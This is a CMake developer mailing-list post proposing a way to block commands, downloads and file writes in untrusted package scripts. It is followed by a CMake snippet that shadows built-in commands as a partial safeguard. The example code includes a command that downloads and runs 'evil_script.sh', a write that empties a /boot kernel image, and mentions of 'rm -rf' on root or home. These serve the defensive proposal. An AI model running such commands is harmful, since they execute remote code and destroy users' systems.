[cmake-developers] Security in CMake
Egor Pugin
egor.pugin at gmail.com
Sat Aug 20 07:48:22 EDT 2016
Hi,
I'm working on a package manager based on cmake.
And some cmake instructions are downloaded with user packages.
I'd like to have the ability to deny some cmake features in such
external untrusted insertions.
1. Disable any COMMAND invocations (in exec[ute]_command,
add_custom_command, add_custom_target etc.)
2. Disable any external_project downloads etc.
3. Disable specific cmake commands (e.g. file(WRITE ...)
4. add more potentially insecure features here
Potential vulnerabilities are (according to previous list):
1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode.
2. Downloading of unwanted scripts. Also applicable to 1).
3. Rewriting important system files (like /boot/kernel.image...,
/lib/libc... etc)
How can it be done?
1. Set a new policy?
2,3. Add new cmake command: enable_command(cmd, {On|Off})
Example:
...
# trusted code above
set_policy(disable COMMAND) # pseudo
enable_command(file, Off)
# untrusted ON
execute_command(
COMMAND wget http://.../evil_script.sh
COMMAND ./evil_script.sh
) # will throw an error - COMMAND is denied
file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error -
file is banned
# untrusted OFF
enable_command(file, On)
set_policy(enable COMMAND) # pseudo
# trusted code below
...
What do you think?
Is it possible in the latest CMake? Or can it be added in the future?
--
Egor Pugin
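As an added example (not from the post or from CMake itself), one approximation of the proposed enable_command()/set_policy(disable COMMAND) that works in existing CMake: a function defined with a built-in command's name shadows it, and the original stays reachable as _<name>. The UNTRUSTED_MODE variable and PACKAGE_DIR path are assumptions; because the untrusted script runs in the same process, it can redefine these functions or the flag, so this catches accidental use rather than enforcing a security boundary.

```cmake
# Added example, not from the post or from CMake: approximating the proposed
# enable_command()/set_policy(disable COMMAND) with command shadowing.
# Defining a function with a built-in command's name overrides it, and the
# original stays reachable as _<name>. Define each override only once:
# a second definition makes _<name> point at the first and recurse forever.

set(UNTRUSTED_MODE OFF)   # assumed flag; ON while untrusted package code runs

function(_deny_if_untrusted cmd)
  if(UNTRUSTED_MODE)
    message(FATAL_ERROR "${cmd} is denied in untrusted package code")
  endif()
endfunction()

# Item 1 of the proposal: no COMMAND invocations while untrusted.
function(execute_process)
  _deny_if_untrusted(execute_process)
  _execute_process(${ARGV})
endfunction()

function(add_custom_command)
  _deny_if_untrusted(add_custom_command)
  _add_custom_command(${ARGV})
endfunction()

function(add_custom_target)
  _deny_if_untrusted(add_custom_target)
  _add_custom_target(${ARGV})
endfunction()

# Item 3: file() keeps working for reads, but subcommands that modify the
# filesystem or touch the network are refused while untrusted.
function(file subcmd)
  if(UNTRUSTED_MODE AND subcmd MATCHES
     "^(WRITE|APPEND|REMOVE|REMOVE_RECURSE|RENAME|COPY|DOWNLOAD|UPLOAD)$")
    message(FATAL_ERROR "file(${subcmd} ...) is denied in untrusted package code")
  endif()
  # ${ARGV} pass-through drops empty arguments and re-splits on ';';
  # every module included after this point also goes through this wrapper.
  _file(${ARGV})
endfunction()

# Usage mirroring the post's trusted/untrusted sections; PACKAGE_DIR is an
# assumed variable holding the downloaded package's directory.
set(UNTRUSTED_MODE ON)
include(${PACKAGE_DIR}/package.cmake)   # a file(WRITE ...) in here now fails
set(UNTRUSTED_MODE OFF)
# Caveat: the included script runs in the same process and scope, so it could
# set(UNTRUSTED_MODE OFF) or redefine these functions itself; this catches
# accidental use, not a hostile package.
```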